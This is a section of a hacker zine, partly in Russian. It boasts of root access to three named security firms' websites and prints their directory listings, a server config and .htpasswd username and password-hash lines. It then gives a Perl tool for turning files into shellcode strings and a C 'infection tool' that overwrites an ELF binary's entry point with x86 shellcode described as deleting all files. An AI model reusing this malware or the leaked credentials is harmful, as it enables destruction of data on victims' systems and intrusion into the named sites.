`` All the small things ``
[+] some fuckin shit
i
i За последнее время перед релизом этого номера мы потеряли root-access
i к сайтам, перечисленным здесь... Не получилось сделать там зеркала,
i а жаль ((
i
i ======================
i [1] www.netsecurity.at
i ======================
i About: No comments... =))
i
i /www/ contents:
i
i _private DIR 09/08/01 15:49 ne005vmo/ne005vmo drwxr--r--
i _vti_bin DIR 09/08/01 15:49 ne005vmo/ne005vmo drwxr-xr-x
i _vti_cnf DIR 09/08/01 15:49 ne005vmo/ne005vmo drwxr-xr-x
i _vti_log DIR 09/08/01 15:49 ne005vmo/ne005vmo drwxr-xr-x
i _vti_pvt DIR 09/08/01 15:49 ne005vmo/ne005vmo drwxr-xr-x
i _vti_txt DIR 09/08/01 15:49 ne005vmo/ne005vmo drwxr-xr-x
i download DIR 07/09/03 08:54 ne005vmo/ne005vmo drwxr-xr-x
i error DIR 09/08/01 15:49 ne005vmo/ne005vmo drwxr-xr-x
i folder DIR 09/04/02 09:08 ne005vmo/ne005vmo drwxr-xr-x
i hgn DIR 07/09/03 10:45 ne005vmo/ne005vmo drwxr-xr-x
i neu DIR 14/03/02 16:23 ne005vmo/ne005vmo drwxr-xr-x
i neu08042002 DIR 08/04/02 16:22 ne005vmo/ne005vmo drwxr-xr-x
i pix DIR 30/07/02 09:30 ne005vmo/ne005vmo drwxr-xr-x
i private DIR 09/08/01 15:49 ne005vmo/ne005vmo drwxr-xr-x
i .htaccess 355 т р 09/08/01 15:49 ne005vmo/ne005vmo -rw-r--r--
i _vti_inf.html 1 716 т р 09/08/01 15:49 ne005vmo/ne005vmo -rw-r--r--
i agb.pdf 34 039 т р 25/02/02 11:24 ne005vmo/ne005vmo -rw-r--r--
i format.css 2 780 т р 14/03/02 14:44 ne005vmo/ne005vmo -rw-r--r--
i hgn.html 466 т р 07/09/03 08:56 ne005vmo/ne005vmo -rw-r--r--
i index.html 3 986 т р 21/05/02 17:52 ne005vmo/ne005vmo -rw-r--r--
i mail.html 436 т р 08/04/02 17:52 ne005vmo/ne005vmo -rw-r--r--
i profile.html 4 833 т р 30/07/02 09:30 ne005vmo/ne005vmo -rw-r--r--
i sectest.php 3 600 т р 09/04/02 09:53 ne005vmo/ne005vmo -rw-r--r--
i SYNHaas.zip 61 502 236 т р 02/11/03 23:41 ne005vmo/ne005vmo -rw-r--r--
i
i there's no any zeroday wahreezz, god dammit (
i
i cat /www/conf/.htpasswd
i ne005vmo:qaEv4urOG6tXc
i
i ================
i [2] cis-cert.org
i ================
i
i About: "CIS - Certification & Information Security Services GmbH"
i
i # start cis-cert.com
i <VirtualHost 213.229.60.12>
i #ThrottlePolicy none
i ServerAdmin [email protected]
i # ProxyPass /java http://java.inode.at:8080/ci002vmo
i # ProxyPassReverse /java http://java.inode.at:8080/ci002vmo
i DocumentRoot /home/ci002vmo/www/home
i ServerName www.cis-cert.com
i ServerAlias *cis-cert.com ci002vmo.monster.inode.at *cis-cert.at *cis-cert.de *cis-cert.ch
i ScriptAlias /cgi-bin/ /home/ci002vmo/www/cgi/
i ErrorDocument 400 /error/error400.php
i ErrorDocument 401 /error/error401.php
i ErrorDocument 402 /error/error402.php
i ErrorDocument 403 /error/error403.php
i ErrorDocument 404 /error/error404.php
i ErrorDocument 500 /error/error500.php
i </VirtualHost>
i # end cis-cert.com
i
i _error DIR 20/03/01 16:08 ci002vmo/ci002vmo drwxr-xr-x
i _private DIR 20/03/01 16:08 ci002vmo/ci002vmo drwxr--r--
i _test DIR 31/05/04 11:18 ci002vmo/ci002vmo drwxr-xr-x
i _vti_bin DIR 20/03/01 16:08 ci002vmo/ci002vmo drwxr-xr-x
i _vti_cnf DIR 20/03/01 16:08 ci002vmo/ci002vmo drwxr-xr-x
i _vti_log DIR 20/03/01 16:08 ci002vmo/ci002vmo drwxr-xr-x
i _vti_pvt DIR 20/03/01 16:08 ci002vmo/ci002vmo drwxr-xr-x
i _vti_txt DIR 20/03/01 16:08 ci002vmo/ci002vmo drwxr-xr-x
i aktuell DIR 17/06/04 15:25 ci002vmo/ci002vmo drwxr-xr-x
i aus DIR 02/03/04 15:58 ci002vmo/ci002vmo drwxr-xr-x
i common DIR 18/10/02 12:28 ci002vmo/ci002vmo drwxr-xr-x
i error DIR 21/10/02 11:04 ci002vmo/ci002vmo drwxr-xr-x
i gfx DIR 03/07/03 16:59 ci002vmo/ci002vmo drwxr-xr-x
i images DIR 20/03/01 16:08 ci002vmo/ci002vmo drwxr-xr-x
i index DIR 03/07/03 16:52 ci002vmo/ci002vmo drwxr-xr-x
i newsletter DIR 02/06/04 13:28 ci002vmo/ci002vmo drwxr-xr-x
i private DIR 02/06/04 13:49 ci002vmo/ci002vmo drwxr-xr-x
i sec DIR 18/10/02 12:29 ci002vmo/ci002vmo drwxr-xr-x
i seminare DIR 28/03/03 12:55 ci002vmo/ci002vmo drwxr-xr-x
i syszert DIR 28/01/03 12:19 ci002vmo/ci002vmo drwxr-xr-x
i wir DIR 18/10/02 12:29 ci002vmo/ci002vmo drwxr-xr-x
i .htaccess 61 т р 23/01/03 16:47 ci002vmo/ci002vmo -rw-r--r--
i
i cat /home/cis-cert/www/conf/.htpasswd
i
i ci002vmo:oNSOowz/eI3Vg
i admin:oNC.Y5lryOnIQ
i
i
i ==============
i [3] 1stcss.com
i ==============
i
i About: "1st Choice Security Services Limited is a privately owned security
i company-providing standard and specialist manned guarding services to a
i diverse customer base."
i
i ls /home/
i
i easilylogo.jpg
i hbmcsmi60rj9
i images
i index.html
i left_frame.html
i main_frame.html
i page_format.css
i pages
i postinfo.html
i _private
i top_frame.html
i _vti_bin
i _vti_cnf
i _vti_inf.html
i _vti_log
i _vti_pvt
i _vti_txt
i
i
i
[+] malware developing t00l
i
i #!/usr/bin/perl
i
i #################################################################
i # conva.pl - converts any file in hex-string.
i #
i # xmpl:
i #
i # $ cat lol
i # abcd
i # $ hexdump lol > install
i # $ ./conva.pl
i # $ cat outro
i # .ascii "\x61\x62\x63\x64"
i # $ and so on with any file
i #
i # if $asm == 0 it converts binary file in standart C format,
i # else - to linux assembler's string .ascii "\x..\x....." etc
i #
i #################################################################
i
i $asm = 0;
i
i
i open(A,"install");
i @list = <A>;
i close(A);
i
i open(NEW,">outro");
i
i for ($i=0; $i < $#list; $i++){
i
i $tmp = $list[$i];
i chomp $tmp;
i
i $str = "";
i
i ($k,$a,$b,$c,$d,$e,$f,$g,$h) = split(/ /,$tmp);
i
i $a =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
i ($junk,$ap,$bp) = split(/z/,$a);
i $str .= "\\x$bp\\x$ap";
i
i $b =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
i ($junk,$ap,$bp) = split(/z/,$b);
i $str .= "\\x$bp\\x$ap";
i
i $c =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
i ($junk,$ap,$bp) = split(/z/,$c);
i $str .= "\\x$bp\\x$ap";
i
i $d =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
i ($junk,$ap,$bp) = split(/z/,$d);
i $str .= "\\x$bp\\x$ap";
i
i $e =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
i ($junk,$ap,$bp) = split(/z/,$e);
i $str .= "\\x$bp\\x$ap";
i
i $f =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
i ($junk,$ap,$bp) = split(/z/,$f);
i $str .= "\\x$bp\\x$ap";
i
i $g =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
i ($junk,$ap,$bp) = split(/z/,$g);
i $str .= "\\x$bp\\x$ap";
i
i $h =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
i ($junk,$ap,$bp) = split(/z/,$h);
i $str .= "\\x$bp\\x$ap";
i
i if ($asm > 0){ $new = ".ascii \"$str\"\n"; }
i if ($asm == 0){ $new = "\"$str\"\n"; }
i
i print NEW "$new";
i }
i
i close(NEW);
i # eof
i
[+] merry-x-mass exploits infection tool
i
i
i #include <stdio.h>
i #include <fcntl.h>
i #include <sys/stat.h>
i #include <sys/types.h>
i
i /* rm-all egg for linux [x86] */
i
i char egg_code[] =
i "\x31\xc0\xb0\x02\xcd\x80\x99\x52\x66\xbb\x81\x8e\x66\x81\xeb\x0f"
i "\x21\x66\x53\x66\x68\x6e\x2f\x68\x2f\x2f\x62\x69\x89\xe3\x66\x52"
i "\x66\xb8\x1f\x5e\x66\x05\x0e\x08\x66\x50\x89\xe6\x66\x52\x66\xb8"
i "\x1f\x41\x66\x05\x0e\x31\x66\x50\x89\xe1\x52\x6a\x2f\x89\xe0\x52"
i "\x50\x56\x51\x53\x89\xe1\x6a\x0b\x58\xcd\x80";
i
i
i int main(int argc, char *argv[])
i {
i int fd;
i unsigned long entry;
i struct stat file;
i
i if (argc < 2){
i printf("Usage: %s <file_to_infect>\n",argv[0]);
i return -1;
i }
i
i printf("[+] opening target file\n");
i fd = open(argv[1], O_RDWR);
i
i if (fd < 0){
i printf("[-] cant open file %s\n",argv[1]);
i return -1;
i }
i
i printf("[+] reading entry point from elf-header\n");
i lseek(fd, 0x18, SEEK_SET);
i read(fd, &entry, 4);
i
i printf("[+] recounting real offset to .text section\n");
i entry = entry - 0x08048000;
i
i fstat(fd, &file);
i
i if (entry > (file.st_size - 0x1c - sizeof(egg_code))){
i printf("[-] file too small\n");
i return -1;
i }
i
i printf("[+] offset to code: 0x%x\n",entry);
i
i lseek(fd, entry, SEEK_SET);
i printf("[+] injecting code...\n");
i write(fd, &egg_code, sizeof(egg_code) - 1);
i printf("[+] done\n");
i close(fd);
i
i return 1;
i }
i
[~]
